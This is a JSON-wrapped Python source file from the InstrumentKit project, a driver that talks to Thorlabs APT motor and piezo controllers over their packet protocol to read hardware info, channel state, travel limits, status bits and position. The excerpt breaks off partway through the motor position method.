+{"seq_id":"553384953","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n##\n# thorlabsapt.py: Driver for the Thorlabs APT Controller.\n##\n# © 2013 Steven Casagrande (scasagrande@galvant.ca).\n#\n# This file is a part of the InstrumentKit project.\n# Licensed under the AGPL version 3.\n##\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n##\n\n## FEATURES ####################################################################\n\nfrom __future__ import division\n\n## IMPORTS #####################################################################\n\nfrom rotational_stage import _abstract\nfrom rotational_stage import _packets\nfrom rotational_stage import _cmds\n\nfrom flufl.enum import IntEnum\n\nimport quantities as pq\n\nimport re\nimport struct\n\n## LOGGING #####################################################################\n\nimport logging\nfrom rotational_stage.util_fns import NullHandler\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(NullHandler())\n\n## CLASSES #####################################################################\n\nclass ThorLabsAPT(_abstract.ThorLabsInstrument):\n '''\n Generic ThorLabs APT hardware device controller. Communicates using the\n ThorLabs APT communications protocol, whose documentation is found in the\n thorlabs source folder.\n '''\n \n class APTChannel(object):\n '''\n Represents a channel within the hardware device. One device can have\n many channels, each labeled by an index.\n '''\n def __init__(self, apt, idx_chan):\n self._apt = apt\n # APT channel numbering is 1-based, but we want the Python\n # representation to be 0-based.\n self._idx_chan = idx_chan + 1\n \n @property\n def enabled(self):\n pkt = _packets.ThorLabsPacket(message_id=_cmds.ThorLabsCommands.MOD_REQ_CHANENABLESTATE,\n param1=self._idx_chan,\n param2=0x00,\n dest=self._apt._dest,\n source=0x01,\n data=None)\n resp = self._apt.querypacket(pkt, expect=_cmds.ThorLabsCommands.MOD_GET_CHANENABLESTATE)\n # param2 is 0x01 when the channel is enabled, 0x02 when disabled.\n return not bool(resp._param2 - 1)\n @enabled.setter\n def enabled(self, newval):\n pkt = _packets.ThorLabsPacket(message_id=_cmds.ThorLabsCommands.MOD_SET_CHANENABLESTATE,\n param1=self._idx_chan,\n param2=0x01 if newval else 0x02,\n dest=self._apt._dest,\n source=0x01,\n data=None)\n self._apt.sendpacket(pkt)\n \n _channel_type = APTChannel\n \n def __init__(self, filelike):\n super(ThorLabsAPT, self).__init__(filelike)\n self._dest = 0x50 # Generic USB device; make this configurable later.\n \n # Provide defaults in case an exception occurs below.\n self._serial_number = None\n self._model_number = None\n self._hw_type = None\n self._fw_version = None\n self._notes = \"\"\n self._hw_version = None\n self._mod_state = None\n self._n_channels = 0\n self._channel = ()\n \n # Perform a HW_REQ_INFO to figure out the model number, serial number,\n # etc.\n try:\n req_packet = _packets.ThorLabsPacket(\n message_id=_cmds.ThorLabsCommands.HW_REQ_INFO,\n param1=0x00,\n param2=0x00,\n dest=self._dest,\n source=0x01,\n data=None\n )\n hw_info = self.querypacket(req_packet, expect=_cmds.ThorLabsCommands.HW_GET_INFO)\n \n self._serial_number = str(hw_info._data[0:4]).encode('hex')\n self._model_number = str(hw_info._data[4:12]).replace('\x00', '').strip()\n \n hw_type_int = struct.unpack('<H', hw_info._data[12:14])[0]\n if hw_type_int == 45:\n self._hw_type = 'Multi-channel controller motherboard'\n elif hw_type_int == 44:\n self._hw_type = 'Brushless DC controller'\n else:\n self._hw_type = 'Unknown type: {}'.format(hw_type_int)\n \n # The fourth firmware-version byte is padding, so only the first\n # three are reported.\n self._fw_version = '{0[0]}.{0[1]}.{0[2]}'.format(struct.unpack('<BBBB', hw_info._data[14:18]))\n self._notes = str(hw_info._data[18:66]).replace('\x00', '').strip()\n \n self._hw_version = struct.unpack('<H', hw_info._data[78:80])[0]\n self._mod_state = struct.unpack('<H', hw_info._data[80:82])[0]\n self._n_channels = struct.unpack('<H', hw_info._data[82:84])[0]\n except IOError as e:\n logger.error('Exception occurred while fetching hardware info: {}'.format(e))\n \n # Create a channel object for each channel the device reports.\n if self._n_channels > 0:\n self._channel = list(self._channel_type(self, chan_idx) for chan_idx in xrange(self._n_channels))\n \n @property\n def serial_number(self):\n return self._serial_number\n \n @property\n def model_number(self):\n return self._model_number\n \n @property\n def name(self):\n return \"ThorLabs APT Instrument model {model}, serial {serial} (HW version {hw_ver}, FW version {fw_ver})\".format(\n hw_ver=self._hw_version, serial=self.serial_number,\n fw_ver=self._fw_version, model=self.model_number\n )\n \n @property\n def channel(self):\n return self._channel\n \n 
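# Hypothetical usage sketch (the names here are illustrative, not part\n # of this module): channels are exposed 0-indexed, and APTChannel maps\n # the index to the protocol's 1-based numbering.\n #\n # apt = ThorLabsAPT(connection)\n # apt.channel[0].enabled = True\n \n 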
@property\n def n_channels(self):\n return self._n_channels\n \n @n_channels.setter\n def n_channels(self, nch):\n # Change the number of channels without touching the channel\n # instances that already exist: new channels are appended, and\n # removed channels are dropped from the end of the list.\n if nch > self._n_channels:\n self._channel = self._channel + \\\n list(self._channel_type(self, chan_idx) for chan_idx in xrange(self._n_channels, nch))\n elif nch < self._n_channels:\n self._channel = self._channel[:nch]\n self._n_channels = nch\n \n def identify(self):\n '''\n Causes a light on the APT instrument to blink, so that it can be\n identified.\n '''\n pkt = _packets.ThorLabsPacket(message_id=_cmds.ThorLabsCommands.MOD_IDENTIFY,\n param1=0x00,\n param2=0x00,\n dest=self._dest,\n source=0x01,\n data=None)\n self.sendpacket(pkt)\n\nclass APTPiezoDevice(ThorLabsAPT):\n '''\n Generic ThorLabs APT piezo device, superclass of more specific piezo devices.\n '''\n \n class PiezoDeviceChannel(ThorLabsAPT.APTChannel):\n ## PIEZO COMMANDS ##\n \n @property\n def max_travel(self):\n pkt = _packets.ThorLabsPacket(message_id=_cmds.ThorLabsCommands.PZ_REQ_MAXTRAVEL,\n param1=self._idx_chan,\n param2=0x00,\n dest=self._apt._dest,\n source=0x01,\n data=None)\n resp = self._apt.querypacket(pkt)\n \n # Not all APT piezo devices support querying the maximum travel\n # distance. Those that do not simply ignore the PZ_REQ_MAXTRAVEL\n # packet, so that the response is empty.\n if resp is None:\n return NotImplemented\n \n chan, int_maxtrav = struct.unpack('<HH', resp._data)\n # The protocol reports the maximum travel in steps of 100 nm.\n return int_maxtrav * pq.Quantity(100, 'nm')\n \n _channel_type = PiezoDeviceChannel\n\nclass APTMotorController(ThorLabsAPT):\n '''\n ThorLabs APT motor controller.\n '''\n \n class MotorChannel(ThorLabsAPT.APTChannel):\n ## MOTOR COMMANDS ##\n \n # Status bit masks as described in the APT protocol documentation\n # for MGMSG_MOT_GET_STATUSUPDATE.\n __STATUS_BIT_MASK = {\n 'CW_HARD_LIM': 0x00000001,\n 'CCW_HARD_LIM': 0x00000002,\n 'CW_SOFT_LIM': 0x00000004,\n 'CCW_SOFT_LIM': 0x00000008,\n 'CW_MOVE_IN_MOTION': 0x00000010,\n 'CCW_MOVE_IN_MOTION': 0x00000020,\n 'CW_JOG_IN_MOTION': 0x00000040,\n 'CCW_JOG_IN_MOTION': 0x00000080,\n 'MOVE_HOMING': 0x00000200,\n 'MOVE_HOMED': 0x00000400,\n 'TRACKING': 0x00001000,\n 'SETTLED': 0x00002000,\n 'MOTION_ERROR': 0x00004000,\n 'MOTOR_CURRENT_LIMIT_REACHED': 0x01000000,\n 'CHANNEL_ENABLED': 0x80000000\n }\n \n @property\n def status_bits(self):\n pkt = _packets.ThorLabsPacket(message_id=_cmds.ThorLabsCommands.MOT_REQ_STATUSUPDATE,\n param1=self._idx_chan,\n param2=0x00,\n dest=self._apt._dest,\n source=0x01,\n data=None)\n resp = self._apt.querypacket(pkt, expect=_cmds.ThorLabsCommands.MOT_GET_STATUSUPDATE)\n # Data layout: channel ident, position counter, encoder count,\n # then the status bits; slice to 14 bytes in case the device\n # appends extra data.\n chan, position, enc_count, status_int = struct.unpack('<HllL', resp._data[:14])\n status_dict = dict(\n (key, (status_int & bit_mask > 0))\n for key, bit_mask in self.__STATUS_BIT_MASK.iteritems()\n )\n \n return status_dict\n \n @property\n def position(self):\n pkt = _packets.ThorLabsPacket(message_id=_cmds.ThorLabsCommands.MOT_REQ_POSCOUNTER,\n param1=self._idx_chan,\n param2=0x00,\n dest=self._apt._dest,\n source=0x01,\n data=None)\n response = self._apt.querypacket(pkt, expect=_cmds.ThorLabsCommands.MOT_GET_POSCOUNTER)\n chan, pos = struct.unpack('